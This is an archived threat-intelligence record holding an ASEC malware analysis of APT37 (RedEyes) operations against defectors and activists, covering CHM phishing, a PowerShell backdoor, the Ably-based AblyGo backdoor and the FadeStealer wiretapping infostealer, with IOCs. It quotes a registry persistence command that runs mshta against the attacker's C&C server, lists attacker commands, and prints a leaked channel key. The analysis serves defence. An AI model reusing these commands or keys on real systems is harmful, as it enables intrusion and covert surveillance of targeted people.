{ "id": "8cb82f79-1db2-47d3-9dfe-cc39cb1da7a9", "created_at": "2026-04-06T00:16:20.312178Z", "updated_at": "2026-04-10T03:38:06.64126Z", "deleted_at": null, "sha1_hash": "9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138", "title": "RedEyes Group Wiretapping Individuals (APT37) - ASEC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 810399, "plain_text": "RedEyes Group Wiretapping Individuals (APT37) - ASEC\r\nBy ATCP\r\nPublished: 2023-06-11 · Archived: 2026-04-05 20:19:50 UTC\r\n1. Overview\r\nRedEyes (also known as APT37, ScarCruft, and Reaper) is a state-sponsored APT group that mainly carries out\r\nattacks against individuals such as North Korean defectors, human rights activists, and university professors. Their\r\ntask is known to be monitoring the lives of specific individuals. In May 2023, AhnLab Security Emergency\r\nresponse Center (ASEC) discovered the RedEyes group distributing and using an Infostealer with wiretapping\r\nfeatures that was previously unknown along with a backdoor developed using GoLang that exploits the Ably\r\nplatform.\r\n* ABLY [1] is a platform for real-time data transfer and messaging. It can also perform publish/subscribe\r\nmessaging, push notifications, real-time query, and state synchronization.\r\nThe threat actor sent their commands through the GoLang backdoor that is using the Ably service. The API key\r\nvalue required for command communication was saved in a GitHub repository. This API key value is necessary\r\nfor communicating with the threat actor’s channel, so anyone is capable of subscribing if they know this key\r\nvalue. Due to this, some of the commands used by the threat actor at the time of analysis could be identified.\r\nASEC aims to share the tactics, techniques, and procedures (TTPs) utilized by the RedEyes group during their\r\nattacks in May 2023. From the initial breach technique, all the way to privilege escalation, command and control,\r\nand exfiltration, each stage used by the RedEyes group to monitor individuals will be covered in this blog post.\r\n2. Analysis\r\n2.1. Initial Access\r\nThe threat actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case\r\ncovered back in March, “Malware Distributed Disguised as a Password File” [2], it is assumed that targets\r\nwere approached via spear phishing emails with a normal password-protected document and a CHM malware\r\ndisguised as a password file attached to them. In other words, by compressing a normal password-protected\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 1 of 13\n\ndocument with CHM malware, the threat actor led users into believing that the CHM file must be executed in\r\norder to view the password-protected document.\r\nWhen a user executes the CHM file, they can see the password information as shown in Figure 3. However, the\r\ninternal script code in the CHM shown in Figure 4 triggers MSHTA.exe to be executed, which causes a malicious\r\nscript from the threat actor’s C\u0026C server to be executed as well.\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 2 of 13\n\nThe malicious script obtained during the analysis was confirmed as PowerShell malware that maintains\r\npersistence through the use of an autorun registry key. It also possesses a backdoor feature.\r\nThe PowerShell malware confirmed back in the February 2023 post, “HWP Malware Using the\r\nSteganography Technique” [3], had relatively simple features. It involved executing the threat actor’s commands\r\nand sending the results using CMD.exe, as well as registering to the RUN key registry for persistence. Although\r\nthe recently obtained PowerShell malware still employs the same registry key registration for persistence, it does\r\nnot use CMD.exe and instead performs different behaviors according to the C\u0026C server command. The features\r\nare shown below in Table 1.\r\nCommand Feature\r\nfileinfo\r\nSends the file list and information (name, size, modified time) in a specific path\r\nsaved as a CSV to the C\u0026C server and deletes the csv\r\ndir\r\nCompresses folders in a specific path and sends the compressed file to the C\u0026C\r\nserver before deleting the file\r\nfile Uploads a specific file to the C\u0026C server\r\ndown Downloads files to a specific path\r\nregedit Feature to edit registry\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 3 of 13\n\ntask\r\nFeature to register to task scheduler so it is executed repeatedly at 10 min\r\nintervals\r\nzip Feature to uncompress files in a specific path\r\nrename Feature to change the name of a specific file\r\ndel Feature to delete files in a specific path\r\nTable 1. PowerShell backdoor features\r\n2.2. Persistence\r\nThe malicious PowerShell script that is executed by MSHTA.exe uses the command below to register itself on the\r\nautorun registry key, allowing malicious scripts to be executed from the threat actor’s C\u0026C server even after\r\nsystem reboots.\r\nNew-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name kcJuWlrQO -\r\nValue ‘c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -\r\nep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html’ -PropertyType\r\nString -Force;\r\n2.3. Command and Control\r\nThe threat actor carried out later attack stages such as privilege escalation, exfiltration, and malware distribution\r\nthrough a backdoor that utilizes the Ably platform service which is based on GoLang. The Ably platform is\r\ncapable of transferring data in real-time, and anyone with a channel authentication key can access the channel to\r\nreceive messages. During the analysis, ASEC managed to secure the authentication key of the threat actor’s\r\nchannel and view some of the commands that were sent to targets.\r\nTime of Transmission Executed Command\r\n2023-05-09 10:16:16 forfiles /p c:\\programdata\r\n2023-05-09 10:49:47 ren c:\\programdata\\wallpaper-river.jpg wallpaper-river.exe\r\n2023-05-09 10:49:53 forfiles /p c:\\programdata\r\n2023-05-09 10:50:09 wmic OS get Caption,CSDVersion,OSArchitecture,Version\r\n2023-05-09 10:50:35 c:\\programdata\\wallpaper-river.exe\r\nTable 2. Commands executed through AblyGo backdoor\r\nThe RedEyes group using Ably to send commands has been reported before by KISA [4] and Sekoia [5]. The\r\nAbly-based GoLang backdoor found at the time had the authentication key within its binary, as shown in Figure 6,\r\nbut the backdoor obtained in this instance saved the authentication key in a GitHub repository, allowing for the\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 4 of 13\n\nauthentication key to be received dynamically for channel communication. This was most likely done so that the\r\nAbly channel authentication key could be changed frequently and to prevent third parties from reading the channel\r\nmessages.\r\nThe GoLang backdoor accesses the GitHub URL that exists within its binary and retrieves the data that is in the\r\n“\u003c\u003eBASE64-encoded channel authentication key” format in order to obtain the Ably channel authentication key.\r\nThis method can also be seen in Figure 4 of “The Unintentional Leak: A glimpse into the attack vectors of\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 5 of 13\n\nAPT37” [6] that was published by zscaler back in March 2023. According to this post, the threat actor\r\nfrequently committed strings encoded in BASE64. Decrypting the string shown in Figure 4 results in the Ably\r\nauthentication key value.\r\n[GitHub Commit String]\r\n\u003c\u003eS3dITXZ3LmJvaUMzdzpqR2JmMDd3VW9iN3RGanoxM1dxRFE4WJRsVFBDbVBQdldzb3hZYjFxc21r\r\n[GitHub Decrypted String]\r\n\u003c\u003eKwHMvw.boiC3w:jGbf07wUob7tFjz13WqDQ8X.lTPCmPPvWsoxYb1qsmk (Ably authentication key)\r\nIf the AblyGo backdoor is executed on an infected system, the “\u003c\u003eauthentication key” is retrieved from GitHub. It\r\nthen parses “\u003c\u003e” with the code part of Figure 7 before decoding the string that follows with BASE64. The threat\r\nactor’s Ably channel is then accessed via the decoded authentication key value where messages named “UP” and\r\n“DOWN” are transmitted and received. The format and features of the transmitted and received data are shown\r\nbelow in Table 3.\r\nMessage Name (Feature) Data Format\r\nUP (Sends HELLO and uploads command\r\nresult)\r\n{“Id”:”PC\r\nName”,”Textdata”:”SEVMTw==”}\r\nDOWN (Transmits CMD command)\r\n{“Id”:”PC\r\nName”,”Textdata”:”SEVMTw==”}\r\nTable 3. Format and features of AblyGo backdoor’s transmitted and received messages\r\nAfter AblyGo is executed on an infected PC, it sends the “HELLO” data encoded in BASE64 at an interval of\r\nabout 2 to 5 minutes to signify that the PC is connected with the threat actor’s Ably channel (Message name: UP).\r\nThe threat actor monitors the Ably channel and identifies the ID of the infected PC. They then encode the\r\ncommand in BASE64 and transmit it again (Message name: DOWN).\r\nThe execution of commands received from the C\u0026C server is performed exclusively through CMD.exe, and the\r\nresults of the CMD commands are transmitted back to the channel using the “UP” message. In other words, “UP”\r\nserves as a message for the threat actor to identify the infected PC and receive command results, while “DOWN”\r\nis used as a message for issuing commands.\r\n2.4. Privilege Escalation\r\nAfter command and control, the threat actor uses a known privilege escalation technique called T1546.015 (Event\r\nTriggered Execution: Component Object Model Hijacking) to execute additional malware. The malware registered\r\nto the registry key in Figure 8 could not be secured.\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 6 of 13\n\n2.5. Exfiltration\r\nThe threat actor utilizes the AblyGo backdoor and MSTHA PowerShell to ultimately execute an Infostealer in a\r\nfileless form.\r\nThe executed Infostealer has various features, such as taking screenshots, exfiltrating data from removable media\r\ndevices \u0026 smartphones, keylogging, and wiretapping.\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 7 of 13\n\nBased on the characteristic of the folder name where the exfiltrated data is stored, ASEC has named this newly\r\ndiscovered malware as FadeStealer (Fade as a stealer). FadeStealer creates individual folders for each exfiltrated\r\ndata in the %temp% directory. It utilizes an integrated RAR compression utility within the file to compress the\r\nexfiltrated data from the infected PC at 30-minute intervals using a password. FadeStealer has a meticulous side to\r\nit as it employs the split compression feature, limiting each volume to a maximum of 1 GB if the compressed file\r\never exceeds 1 GB.\r\nFolder Path Exfiltrated Data\r\n%temp%\\VSTelems_Fade\\NgenPdbc Screenshots\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 8 of 13\n\n%temp%\\VSTelems_Fade\\NgenPdbk Keylogging\r\n%temp%\\VSTelems_Fade\\NgenPdbm Microphone wiretapping\r\n%temp%\\VSTelems_FadeIn Data collection of smartphone device\r\n%temp%\\VSTelems_FadeOut Removable media device\r\nTable 4. Folder paths and exfiltrated data\r\nCompression Option Feature Explanation\r\na Add compressed file\r\nr Recover compressed file\r\nep1 Remove base directory from name\r\nm0 Set compression level (save)\r\ny Automatically answer yes to all questions\r\np NaeMhq[d]q Set compression password as NaeMhq[d]q\r\nv1g Set compression volume limit to 1 GB\r\nTable 5. Compression options\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 9 of 13\n\n3. Conclusion\r\nThe RedEyes group carries out attacks against specific individuals such as North Korean defectors, human rights\r\nactivists, and university professors. Their primary focus is on information theft, and an Infostealer with a feature\r\nto wiretap microphones was discovered in this recent attack case. Unauthorized eavesdropping on individuals in\r\nSouth Korea is considered a violation of privacy and is strictly regulated under relevant laws. Despite this, the\r\nthreat actor monitored everything victims did on their PC and even conducted wiretapping.\r\nIf you examine the overall attack flow in this case, the threat actor carried out their attack cleverly and precisely\r\nby employing spear phishing emails to gain access to target systems and using an Ably channel as a command-and-control server. These sorts of attacks are difficult for individuals to notice. As such, ASEC is closely tracking\r\nthe activities of the RedEyes group and responding promptly to prevent further damage.\r\nUsers must refrain from opening files from unknown sources to prevent themselves from being harmed.\r\nEspecially now since the group in question has recently been using malware based on CHM and LNK extensions\r\nto perform their initial breach, extra attention should be given to the file extensions when executing email\r\nattachments. The file extension is set to hidden by default, so it is recommended to refer to Figure 14 and uncheck\r\nthe “Hide extensions for known file types”. If the attached files are CHM or LNK, then it is crucial that you verify\r\nthe source of the email before executing them.\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 10 of 13\n\n4. Reference\r\n[1] Ably\r\n[2] Malware Distributed Disguised as a Password File\r\n[3] HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)\r\n[4] TTPs $ ScarCruft Tracking Note – KISA\r\n[5] Peeking at Reaper’s surveillance operations – sekoia\r\n[6] The Unintentional Leak: A glimpse into the attack vectors of APT37 – zscaler\r\n[File Detection]\r\nTrojan/Win.Goably.C5436296 (2023.06.03.00)\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 11 of 13\n\nTrojan/Win.Goably.C5422375 (2023.05.09.02)\r\nTrojan/Win.Loader.C5424444 (2023.05.09.02)\r\nData/BIN.RedEyes (2023.06.08.01)\r\nDownloader/CHM.Generic (2023.06.02.03)\r\nDownloader/PowerShell.Generic (2023.06.06.00)\r\n[Behavior Detection]\r\nInjection/EDR.Event .M11124\r\n[Exfiltrated Data Save URL]\r\nhxxp://172.93.181[.]249/control/data/\r\n[AblyGo Backdoor Upload Path]\r\nhxxp://172.93.181[.]249/file/\r\n[PowerShell Backdoor Download URL After Initial Breach Stage]\r\nhxxp://172.93.181[.]249/control/html/1.html\r\nMD5\r\n1352abf9de97a0faf8645547211c3be7\r\n1c1136c12d0535f4b90e32aa36070682\r\n3277e0232ed6715f2bae526686232e06\r\n3c475d80f5f6272234da821cc418a6f7\r\n59804449f5670b4b9b3b13efdb296abb\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//172[.]93[.]181[.]249/control/data/\r\nhttp[:]//172[.]93[.]181[.]249/control/html/1[.]html\r\nhttp[:]//172[.]93[.]181[.]249/file/\r\nAdditional IOCs are available on AhnLab TIP.\r\nTo learn more about AhnLab EDR's advanced behavior-based detection and reponse, please click the banner\r\nbelow\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 12 of 13\n\nSource: https://asec.ahnlab.com/en/54349/\r\nhttps://asec.ahnlab.com/en/54349/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://asec.ahnlab.com/en/54349/" ], "report_names": [ "54349" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434580, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.pdf", "text": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.txt", "img": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.jpg" } }